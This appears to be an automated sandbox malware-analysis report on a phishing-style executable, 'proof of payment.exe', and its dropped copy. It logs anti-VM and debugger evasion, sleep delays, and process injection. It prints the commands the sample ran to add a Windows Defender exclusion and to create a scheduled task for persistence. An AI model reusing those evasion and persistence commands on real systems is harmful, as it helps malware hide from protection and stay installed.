                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: proof of payment.exe PID: 2228, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: NvbYSEq.exe PID: 4984, type: MEMORYSTR
                    Delayed program exit found
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0040F7A7 Sleep,ExitProcess,12_2_0040F7A7
                    Source: C:\Users\user\Desktop\proof of payment.exeMemory allocated: D10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeMemory allocated: 2660000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeMemory allocated: 4660000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeMemory allocated: 7550000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeMemory allocated: 6C30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeMemory allocated: 8550000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeMemory allocated: 9550000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeMemory allocated: C20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeMemory allocated: 25A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeMemory allocated: 45A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeMemory allocated: 6F00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeMemory allocated: 7F00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeMemory allocated: 80A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeMemory allocated: 90A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,12_2_0041A748
                    Source: C:\Users\user\Desktop\proof of payment.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7158Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2275Jump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeWindow / User API: threadDelayed 6725Jump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeWindow / User API: threadDelayed 2964Jump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeWindow / User API: foregroundWindowGot 1771Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeAPI coverage: 6.1 %
                    Source: C:\Users\user\Desktop\proof of payment.exeAPI coverage: 9.7 %
                    Source: C:\Users\user\Desktop\proof of payment.exe TID: 2280Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1132Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exe TID: 3152Thread sleep count: 108 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exe TID: 3152Thread sleep time: -54000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exe TID: 4944Thread sleep count: 6725 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exe TID: 4944Thread sleep time: -20175000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exe TID: 4944Thread sleep count: 2964 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exe TID: 4944Thread sleep time: -8892000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe TID: 1708Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 7_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_100010F1
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 7_2_10006580 FindFirstFileExA,7_2_10006580
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_00409253
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_0041C291
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_0040C34D
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_00409665
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0044E879 FindFirstFileExA,12_2_0044E879
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,12_2_0040880C
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0040783C FindFirstFileW,FindNextFileW,12_2_0040783C
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00419AF5
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040BB30
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040BD37
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_0040AE51 FindFirstFileW,FindNextFileW,15_2_0040AE51
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407EF8
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 20_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,20_2_00407898
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00407C97
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_00418981 memset,GetSystemInfo,15_2_00418981
                    Source: C:\Users\user\Desktop\proof of payment.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWM
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015EA000.00000004.00000020.00020000.00000000.sdmp, proof of payment.exe, 00000007.00000002.3915520188.0000000001567000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: C:\Users\user\Desktop\proof of payment.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 7_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_100060E2
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041CB50
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 7_2_10004AB4 mov eax, dword ptr fs:[00000030h]7_2_10004AB4
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_004432B5 mov eax, dword ptr fs:[00000030h]12_2_004432B5
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 7_2_1000724E GetProcessHeap,7_2_1000724E
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 7_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_100060E2
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 7_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_10002639
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 7_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_10002B1C
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_004349F9
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_00434B47 SetUnhandledExceptionFilter,12_2_00434B47
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043BB22
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00434FDC
                    Source: C:\Users\user\Desktop\proof of payment.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NvbYSEq.exe"
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NvbYSEq.exe"Jump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeMemory written: C:\Users\user\AppData\Roaming\NvbYSEq.exe base: 400000 value starts with: 4D5AJump to behavior
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: NULL target: C:\Users\user\Desktop\proof of payment.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: NULL target: C:\Users\user\Desktop\proof of payment.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: NULL target: C:\Users\user\Desktop\proof of payment.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe12_2_004120F7
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_00419627 mouse_event,12_2_00419627
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NvbYSEq.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\uevjjogtpiaq"Jump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\eyacchqudqsuyhp"Jump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\eyacchqudqsuyhp"Jump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\pbfmdzborykhjndcrx"Jump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\pbfmdzborykhjndcrx"Jump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\pbfmdzborykhjndcrx"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpE166.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess created: C:\Users\user\AppData\Roaming\NvbYSEq.exe "C:\Users\user\AppData\Roaming\NvbYSEq.exe"Jump to behavior
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerYW\
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerb
